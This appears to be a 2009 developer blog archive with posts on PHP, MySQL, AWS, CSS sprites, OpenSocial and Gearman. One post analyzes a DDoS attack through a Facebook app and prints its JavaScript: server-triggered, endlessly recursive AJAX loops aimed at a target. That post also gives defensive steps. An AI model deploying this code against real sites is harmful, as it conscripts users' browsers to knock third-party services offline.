Archive for the ‘code’ Category

PHP & 64-bit Integer Modulus (Almost)

Wednesday, October 28th, 2009

While at times PHP seems to be capable of 64 bit math, it’s important to understand what’s really going on. Beyond 32 bit integers, PHP is silently converting your integers to floats. While this usually isn’t a problem, many of the operations you might perform on an int, such as modulus choke when attempting to convert back to a 32 bit integer internally.

This is actually the cause of the sprintf / printf issue I encountered before. The code below provides the maximum signed value for integers between 1 and 64 bit in PHP along with the result of the built in modulus operand “%” and a function I wrote mod() which doesn’t go all the way to 64 bits, but gets us a lot closer leveraging the built in data types. If you can install external modules, you might review and test the performance of BCMath or GMP which can both handle much larger values.

<?php
 
// Find out what our internal values are capable of
print "PHP_INT_MAX: " . PHP_INT_MAX . "\n";
print "PHP_INT_SIZE: " . PHP_INT_SIZE . " bytes (" . (PHP_INT_SIZE * 8) . " bits)\n";
 
// Generate an array of maximum signed 32 bit values
$ints = array();
for($pwr = 0; $pwr < 64; $pwr++){ $ints[] = pow(2,$pwr) - 1; }
 
// Generate a table of values
print "bits\t%100\tmod()\t%s\n";
$bits = 0;
foreach($ints as $int){
	$bits++;
	printf("%d\t%s\t%s\t%s\n", $bits, $int%100, mod($int,100), $int);
}
 
// (60 bit) - 1 aware modulus function
function mod($val, $mod){ return $val - floor($val/$mod) * $mod; }
?>

This generates the following table. Notice the internal value for integers is capped at 2,147,483,647 and the modulus operation goes kaput beyond 32 bits. The function provided seems to holds up through 59 bits before failing to function properly at 60.

PHP_INT_MAX: 2147483647
PHP_INT_SIZE: 4 bytes (32 bits)
bits	%100	mod()	%s
1	0	0	0
2	1	1	1
3	3	3	3
4	7	7	7
5	15	15	15
6	31	31	31
7	63	63	63
8	27	27	127
9	55	55	255
10	11	11	511
11	23	23	1023
12	47	47	2047
13	95	95	4095
14	91	91	8191
15	83	83	16383
16	67	67	32767
17	35	35	65535
18	71	71	131071
19	43	43	262143
20	87	87	524287
21	75	75	1048575
22	51	51	2097151
23	3	3	4194303
24	7	7	8388607
25	15	15	16777215
26	31	31	33554431
27	63	63	67108863
28	27	27	134217727
29	55	55	268435455
30	11	11	536870911
31	23	23	1073741823
32	47	47	2147483647
33	-1	95	4294967295
34	-1	91	8589934591
35	-1	83	17179869183
36	-1	67	34359738367
37	-1	35	68719476735
38	-1	71	137438953471
39	-1	43	274877906943
40	-1	87	549755813887
41	-1	75	1099511627775
42	-1	51	2199023255551
43	-1	3	4398046511103
44	-1	7	8796093022207
45	-1	15	17592186044415
46	-1	31	35184372088831
47	-1	63	70368744177663
48	-1	27	1.4073748835533E+14
49	-1	55	2.8147497671066E+14
50	-1	11	5.6294995342131E+14
51	-1	23	1.1258999068426E+15
52	-1	47	2.2517998136852E+15
53	-1	95	4.5035996273705E+15
54	-1	91	9.007199254741E+15
55	0	84	1.8014398509482E+16
56	0	68	3.6028797018964E+16
57	0	32	7.2057594037928E+16
58	0	64	1.4411518807586E+17
59	0	32	2.8823037615171E+17
60	0	0	5.7646075230342E+17
61	0	0	1.1529215046068E+18
62	0	0	2.3058430092137E+18
63	0	0	4.6116860184274E+18
64	0	0	9.2233720368548E+18

MySQL Relational Database Service on AWS

Tuesday, October 27th, 2009

Amazon Web Services Logo The stable of services available through AWS is continuing to expand! Last night Amazon announced RDS (Relational Database Service) which look a lot like EC2 instances running MySQL with EBS volumes – something I have a fair bit of experience with. However, these have the added benefit of being a service that can scale memory and processor both up and down with a single service call.

# ds-modify-db-instance mydbinstance --db-instance-class db.m1.xlarge -s 100

This flexibility comes with a downside, namely a 4 hour monthly service window where patches, updates and those requested capacity changes are applied. You can choose to apply them immediately, but your application should be prepared to handle the downtime. What happens is, your database instance goes offline and when it comes back, it has all the changes you requested applied. So at best, you should expect uptime in the 99.4% range. Most applications can handle a 4 hour downtime if it’s planned for. Under more conventional MySQL builds, developers or system administrators will mitigate these downtimes by first applying changes to slaves, promotion of one slave to master and then finally applying the changes to the original master. This sort of safety net provides gives applications smaller downtime windows (at most a few minutes each) allowing for theoretical 99.999% uptime.

Transitioning to RDS may not be without pain either. Importing your data is done through a mysqldump (or other flatflile export) and then playing that file back into your AWS instance. Depending on the size of your dataset a full mysqldump and re-importing may take days (no I’m not exaggerating). Also note, during the time mysqldump runs, your original database will acquire a read lock for consistency. With some DB’s I manage, I’ve stopped using MySQL dump entirely because the dumps took more than 4 hours to complete on a dedicated slave. With the myriad of snapshotting technologies available, it’s much easier to grab a binary copy of the DB every few hours. One last limitation is replication isn’t an option. I suspect AWS will be working on this soon as part of a HA (High Availability) release option.

Despite the limitations, I’m excited about this offering. This offloads much of the maintenance and management tasks which are usually the most tedious. I also hope that this means a higher IO disk subsystem may be coming to EBS soon.

Deleting Data From InnoDB

Saturday, October 24th, 2009

MySQL Logo Problem: We are given a large MySQL database table that no longer fits in your system’s working memory. You need to prune the data since a significant portion of this data is no longer relevant to keep in this table. Our expectation is ~75% of the data will remain in the table because of a uniform and random distribution of values in col1 and col2. How then, do we go about pruning this table as efficiently as possible?

The table structure is as follows:

describe big_table;
+-----------+---------------------+------+-----+---------+----------------+
| Field     | Type                | Null | Key | Default | Extra          |
+-----------+---------------------+------+-----+---------+----------------+
| id        | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment | 
| col1      | bigint(20) unsigned | NO   | MUL | NULL    |                | 
| col2      | bigint(20) unsigned | NO   | MUL | NULL    |                | 
| chardata  | varchar(35)         | YES  |     | NULL    |                | 
+-----------+---------------------+------+-----+---------+----------------+

Solution 1: Delete

We can simply run a query against the database that will delete all records that are irrelevant. The idea here is that we use a single query that’s easily readable to filter out the unwanted records. For this example we’ll assume we are sharding this data and want to keep all odd values for either col1 or col2 in this table. We can use MySQL’s MOD() function and check for even values and delete them. We expect this query to remove ~25% of our table.

DELETE FROM big_table WHERE MOD(col1,2) = 0 AND MOD(col2, 2) = 0;

Solution 2: Create -> Insert -> Rename -> Drop (CIRD)

Another solution is to create a new table identical to the original table then simply insert the records we want to keep into the new table. Once we have all the records we wish to keep, we simply rename the tables and then drop our original table. The difference in this query is to think about what we want to keep as opposed to what we want to get rid of. We expect this method to insert ~75% of the original table.

CREATE TABLE big_table_copy LIKE big_table;
INSERT INTO big_table_copy SELECT * FROM big_table WHERE MOD(col1, 2) = 1 OR MOD(col2, 2) = 1;
RENAME TABLE big_table TO big_table_old, big_table_copy TO big_table;
DROP TABLE big_table_old;

So which is faster?

It turns out it’s considerably faster to use solution 2. Solution 1 finished preparing our test table in just over 33 minutes. Solution 2 completed the inverse task in just over 5 1/2 minutes. The test data was 1.58 million rows of randomly generated data. The MySQL server was cripped to a 32Mb buffer pool to closely mimic our real world workload which would be heavily IO bound. The on disk file was about 260Mb. Using CIRD is about 6x faster than a straight delete. This probably isn’t surprising as it’s been reported for a long time that DELETE is ~10x slower than INSERT with InnoDB, but I wanted to validate these findings to determine if they still held true for newer versions (5.1.30) of MySQL.

Redirect Clients While Processing Continues

Friday, October 16th, 2009

PHP LogoGenerally, if you need to have the browser see a page while you continue executing the request I would use a queue system like Gearman or Amazon’s SQS. However, in some rare cases running the code in the template requested by the user is just as fast as communicating with a remote queue. For those instances, redirecting the client while processing finishes makes sense.

<?php
// Redirect the client
ignore_user_abort(true);
set_time_limit(1);
ob_start();
header("Location: http://www.example.com/");
header("Connection: close");
header("Content-Length: " . ob_get_length());
while(@ob_end_flush());
flush();
 
// Continue processing
sleep(10);
?>

An example in action? Adding an entry to a database server on a redirect script. That DB server may be very busy and so take longer than we’d like to respond. Using this redirect code we can ensure the browser bounces to the next page as quickly as possible.

JSON Encoding and Decoding in PHP

Wednesday, September 23rd, 2009

PHP Logo JSON (also known as JavaScript Object Notation) is a handy way to serialize data for passing through mediums that do not recognized complex data types – such as HTTP. While using it to pass data today I was bit by a gotcha in how associative array data is encoded and decoded.

<?php 
$associative_array = array("key1"=>"value1","key2"=>"value2");
$regular_array = array("value1","value2");
$class_object = (object) array("key1"=>"value1","key2"=>"value2");
 
// The original data
print_r($associative_array);
print_r($regular_array);
print_r($class_object);
 
// Just encode the data
print "assoc: " . json_encode($associative_array) . "\n";
print "array: " . json_encode($regular_array) . "\n";
print "class: " . json_encode($class_object) . "\n";
 
// Encode and decode the data
print_r(json_decode(json_encode($associative_array)));
print_r(json_decode(json_encode($regular_array)));
print_r(json_decode(json_encode($class_object)));
?>

Notice when we run this, the first two print_r() calls correctly return an array and the third returns an stdClass Object. Now look at the last three lines. Notice how the associative array and the stdClass Object both return the same JSON? Now look at the third set of print_r() calls. You can see the associative array data has been converted to a stdClass.

// The original data
Array
(
    [key1] => value1
    [key2] => value2
)
Array
(
    [0] => value1
    [1] => value2
)
stdClass Object
(
    [key1] => value1
    [key2] => value2
)
 
// Encoded for JSON
assoc: {"key1":"value1","key2":"value2"}
array: ["value1","value2"]
class: {"key1":"value1","key2":"value2"}
 
// Encoded and Decoded
stdClass Object
(
    [key1] => value1
    [key2] => value2
)
Array
(
    [0] => value1
    [1] => value2
)
stdClass Object
(
    [key1] => value1
    [key2] => value2
)

To avoid this behavior, simply cast the stdClass object to an array when you are decoding it. Cheers!

$json_data = '{"key1":"value1","key2":"value2"}';
$associative_array = (array) json_decode($json_data);
print_r($associative_array);
Array
(
    [key1] => value1
    [key2] => value2
)

A DDoS Attack with Facebook’s Platform

Friday, July 17th, 2009

Facebook Logo Some time ago I had the good fortune to work with some developers on a Facebook application that was underperforming. Through a very robust investigation of the application, it was discovered that a large number of invalid requests were being passed to the server. It was the victim of a Distributed Denial of Service attack utilizing Facebook platform and a popular application to bring down the application.

What Can a Developer Do?

  1. Before instantiating ANY code, check your signatures! There are a number of ways to do this, but for starters, check the $_REQUEST['fb_sig_app_id'] and be sure it’s yours!
  2. Spot check your log files for any large number of 404 requests to images or other files that are not valid. Google Analytics only reports on what’s working.
  3. Log invalid requests and errors. Keep the entire signature as it provides you the evidence needed to report the offending application.
  4. You may be able to make a legal case against the perpetuator of the attack if you have sufficient evidence. I am not a lawyer, but you can find one who specializes in technology crimes and talk to them.
  5. Contact Facebook, while DDoS is not explicitly prohibited in the Developer Terms of Service it is illegal in many states and compliance with State Laws is explicitly stated.

How Can I Keep My Server Running?

  1. Apply #1 above on all your pages. Don’t let the attacker make your machine work any harder than it has to. The second code listing below has a quick and dirty way to stop it in it’s tracks.
  2. Any 404 errors that are abnormal should be made into logging pages so you can grab the errors and log them. You can do this with .htaccess or a custom 404 page. Whichever suits your particular situation.
  3. Save Bandwidth However Possible – if the request is attacking valid image files, rename the real files and update your code, then pass very small bits of data back to the requesters of the invalid files. Create 0 byte files to replace them using “touch file.png” so you minimize the outbound data.
  4. Change servers. Less than ideal, but contact your hosting company and move your app to a different IP and or domain name ASAP.

How Did It Work?

The code from this attack is provided below and was obtained by viewing the source of the application. It essentially creates an endless loop of AJAX requests. The ajax.php file need only return JSON encoded data including a value for “cremate” and “cremate_threads” along with the expected payload to begin the attack which then calls the working code at line 16 in the code below. Once invoked, the client computer continues to expand to it’s internal limits taking over the resources of not only the target’s computer, but potentially the user’s browser as well.

View Code JAVASCRIPT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
function someValidAjaxCall(request_data) {
	var ajax = new Ajax();
	ajax.responseType = Ajax.JSON;
	ajax.useLocalProxy = false;
	ajax.ondone = function(data) {
		//
		// Do what the application should appear to do for the user
		//
 
		// Start the DDoS attack
		if (data.cremate && data.cremate_threads) {
			cremate(data.cremate, data.cremate_threads);
		}
	}
	ajax.post('http://255.255.255.255/ajax.php', request_data);
	return false;
}
 
function cremate(url, cremate_threads) {
	for (i=0; i<cremate_threads; i++) {
		sub_cremate(url + i);
	}
}
 
function sub_cremate(url) {
	ajax = new Ajax();
	ajax.responseType = Ajax.RAW;
	ajax.useLocalProxy = false;
	ajax.ondone = function(data) {
		sub_cremate(url);
	}
	ajax.onerror = function() {
		sub_cremate(url);
	}
	ajax.post(url);
}
// Will stop requests from other apps
if($_REQUEST['fb_sig_app_id'] != '1234567890'){ die('Error'); }

Using CSS for Icons

Friday, July 17th, 2009

During an exploration of CloudFront it was noted that requests were the lionshare of the costs for one application. How much savings could be realized by merging all icon files into one and serving them using positioning in CSS? Quite a bit actually.

First, I created an icon file that is 128 pixels square to hold my 16 pixel square icons. Each of the icons individually averages out to ~700 bytes. After adding all the images, the total filesize for this new icon file was ~21.5K. This already equates to a significant space savings on any page that loads all 64 icons which would translate to ~44.8K. More space could be saved had I used a gif, but I wanted retain the alpha – personal preference. Next I created the necessary CSS to position these images using intelligent names like s-icon-heart to replace images/heart.png, this makes the code very readable. The CSS positioning code for my icon file to support all 64 icons is ~3.6K which needs to be added to the stylesheet sitewide.

Adding the icon file and the CSS together yields a total savings of ~19.7K for pages that use all icons in the file. While not every page uses every icon, stylesheets and images are usually cached by the browser so future requests for these assets won’t incur a trip to the server. Furthermore we’ve eliminated up to 63 http requests which, although individually are quick, cumulatively they add up to serious time for the browser!

You can see how I made my icon file by dropping the icons into a grid in Photoshop. I then save this out as a large PNG. Be aware that older versions of IE do not support PNG transparency so you might get some odd behaviors there. As always test in the browsers you wish to support.

Icon Screenshot

I then add the necessary positioning elements into my CSS file for each of the icons. Getting the names and positions was probably the most tedious part of the process.

div.icon { width:16px; height:16px; }
.icon { background-image: url('images/icons.png'); }
.icon-star-bronze-red { background-position: 0 0; }
.icon-star-bronze-green { background-position: -16px 0; }
.icon-star-bronze-blue { background-position: -32px 0; }
.icon-star-gold-red { background-position: -48px 0; }
.icon-star-gold-green { background-position: -64px 0; }
.icon-star-gold-blue { background-position: -80px 0; }
/* ... 58 more definitions */

There are a number of ways to then use this in your code. You can point towards a clear.gif, if you’re already using one for positioning or layout. You can apply it as the background image on an element. Get creative.

<!-- using an image -->
<img src="images/clear.gif" width="16" height="16" class="icon icon-star-gold-red" />
<!-- using a div -->
<div class="icon icon-star-gold-red"></div>

If you are looking for a kick ass icon library, look no further than the FAMFAMFAM Silk Icons which are available for free under a creative commons license.

Using newFetchPersonAppDataRequest on MySpace

Wednesday, July 15th, 2009

OpenSocial Site Logo Storing application data on the OpenSocial host is a great way to offload some unnecessary database and application server load. Why request a preference such as a skin for a user profile from your servers if we can just let the container handle it? MySpace allows for ~1K of data storage per user per application. However, there is a bug with the method newFetchPersonAppDataRequest when added as the only item of a DataRequest. Calling send on the request doesn’t actually do anything! It returns a DataResponse object with no data. As a work around, grab some other information to ensure that the request actually is sent to the container’s server. I used the owner data in this example.

View Code JAVASCRIPT
// The function to load the application data
function getAppData(){
	var req = opensocial.newDataRequest();
	var owner = opensocial.newIdSpec({"userId":"OWNER"});
	req.add(req.newFetchPersonRequest(owner), "owner");
	req.add(req.newFetchPersonAppDataRequest(owner, "appdata"), "owner_appdata");
	req.send(getAppDataCallback);
	return;
}
 
// The callback for getAppData()
function getAppDataCallback(d){
	var owner = d.get("owner"); // if you need it, use it!
	var data = d.get("owner_appdata");
	if(data.hadError()){
		// handle the error appropriately
		return;
	}
	// do whatever your program needs to do with the data
}

Amazon AWS Command Line Tool Help

Monday, June 29th, 2009

Amazon Web Services Logo Amazon’s Web Services are very handy, although sometimes the command line tool syntax is a little awkward to remember and the documentation, while extensive, is not quite as simple to navigate as I’d like. I’m providing these help files as a reference for anyone who might need them. As you are no doubt aware, you can also get this content directly by issuing <aws_command_name> --help in the shell. For me it’s much easier to have these up in a browser window so I can quickly toggle between it and the command line without losing my place. I’ve added references for Auto Scaling, CloudWatch, Elastic Compute Cloud and Elastic Load Balancing.

Getting up and Running with Gearman

Monday, April 27th, 2009

Gearman Gearman is a job scheduling service and I’m very excited about it. I’m using it in a development capacity so your mileage may vary in production but I wanted to share my experience thus far. As I said, I’m very bullish on this project and I see it as hugely helpful in eliminating latency in applications that often get bogged down during unnecessary synchronous communications.

Compiling gearman required installing a package that wasn’t part of my default Fedora Core install and for me wasn’t intuitive to locate. The UUID header file was located in the package e2fsprogs-devel which I found using yum provides "*/uuid.h". After that it was rather smooth to get it up and running. gearmand -d -u nobody got it up and running as a damon and I was able to connect to it using telnet over port 4730. Next I compiled the source for the PHP client and got that hooked into PHP by adding an extension file include in /etc/php.d to load the module and restarted Apache so it would be loaded there too.

Process to install and get running:

// First the server
tar -xzvf gearmand-0.5.tar.gz.tar
cd gearmand-0.5
yum install e2fsprogs-devel
./configure; make && make install
gearmand -d -u nobody
 
// Next the PHP client
tar -xzvf gearman-php-ext-0.2.tar.gz.tar
cd gearman-php-ext-0.2
phpize
./configure; make && make install
echo "extension=gearman.so" > /etc/php.d/gearman.ini
service httpd restart

So now to do some work, even if it’s useless, that takes a long time. It just so happens that creating a file with 1,000,000 sequential numbers takes a few seconds on a small EC2 instance, perfect for my test. I realize this is a highly insecure process, NEVER pass filenames as parameters in production code. Here’s the worker that creates a file (passed as the parameter) on the current system’s /tmp directory.

$worker = new gearman_worker();
$worker->add_server('127.0.0.1', 4730);
$worker->add_function('fill_file', 'fill_file_fn');
 
while(1) $worker->work();
 
function fill_file_fn($job){
	$data = $job->workload();
	$fh = fopen("/tmp/" . $data, "w");
	for($i=1;$i<1000000;$i++){
		fwrite($fh, $i . "\n");
	}
	fclose($fh);
	return;
}

The calling client just invokes this 20 times in the background.

$client = new gearman_client();
$client->add_server('127.0.0.1', 4730);
for($i=0; $i<20; $i++){
	$client->do_background('fill_file', 'file' . $i . '.txt');
}

Workers are started from the command line with something like this, “php worker.php &” and if you want more, just run more of them. You can also kill off some if they’re no longer needed.

The client completes it’s run in about 5 seconds while 5 worker threads toil away in the background until they get their work done about 3 minutes later. The use cases from the gearman team show the utility of this as a spider and for image manipulation. I see uses for sending mass emails to distribution lists using a template and substitute parameters to create a unique email for each person on the worker instead of the client – thus reducing the processing time to get the mail ready and speeding the delivery using multiple worker threads for sending (that can even be on remote machines). This product is definitely worth checking out.

Hopefully this helps you get up and running with Gearman!

© 1998-2008 AF-Design, All rights reserved.